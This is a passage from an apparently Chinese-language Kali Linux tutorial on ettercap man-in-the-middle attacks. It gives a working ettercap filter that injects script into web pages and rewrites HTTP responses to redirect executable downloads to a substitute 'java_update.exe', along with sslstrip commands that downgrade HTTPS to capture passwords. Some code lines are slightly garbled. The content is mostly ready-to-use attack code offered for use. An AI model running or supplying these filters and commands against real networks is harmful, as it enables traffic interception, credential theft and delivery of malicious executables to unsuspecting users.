issue these commands to the GUI--【腳本alert('just for a test!');");alert('just for a test');");
msg("Filter run!...Exploit code injected ok!\n");
}
}
(4)替換URL
15 # replace rmccurdy with your website
16 # replace the url with what ever exe you like
17
18 if (ip.proto == TCP && tcp.dst == 80) {
19 if (search(DATA.data, "Accept-Encoding")) {
20 replace("Accept-Encoding", "Accept-Rubbish!");
21 # note: replacement string is same length as original string
22 msg("zapped Accept-Encoding!n");
23 }
24 }
25 if (ip.proto == TCP && tcp.src == 80) {
26 replace("keep-alive", "close" ");
27 replace("Keep-Alive", "close" ");
28 }
29
30 if (ip.proto == TCP && search(DATA.data, ": application") ){
31 # enable for logging log(DECODED.data, "/tmp/log.log");
32 msg("found EXEn");
33 # "Win32" is the first part of the exe example:
34 # if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
35 if (search(DATA.data, "Win32")) {
36 msg("doing nothingn");
37 } else {
38 replace("200 OK", "301 Moved Permanently Location: http://127.0.0.1/java_update.exe ");
39 msg("redirect successn");
40 }
41 }
0x03 SSL密碼嗅探
對SSL流量的嗅探,可以使用sslstrip這個工具,它的原理就是把所有的https流量降級為http流量。相當於一箇中間人的角色,它與服務器建立正常的https廉潔,而與瀏覽器則使用http連接。使用時需要本機開啟流量轉發,將80端口的http流量同時轉發到10000端口上,在10000端口上使用sslstrip來監聽即可:
# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
# sslstrip -l 10000
---------------------------------------------------------------------------------------------------
以下視頻觀看kali linux 系ettercap 命令使用教程
---------------------------------------------------------------------------------------------------
如果大家喜歡本教程可以點贊或轉發收藏了。。。。。。
閱讀更多 電腦技術學習 的文章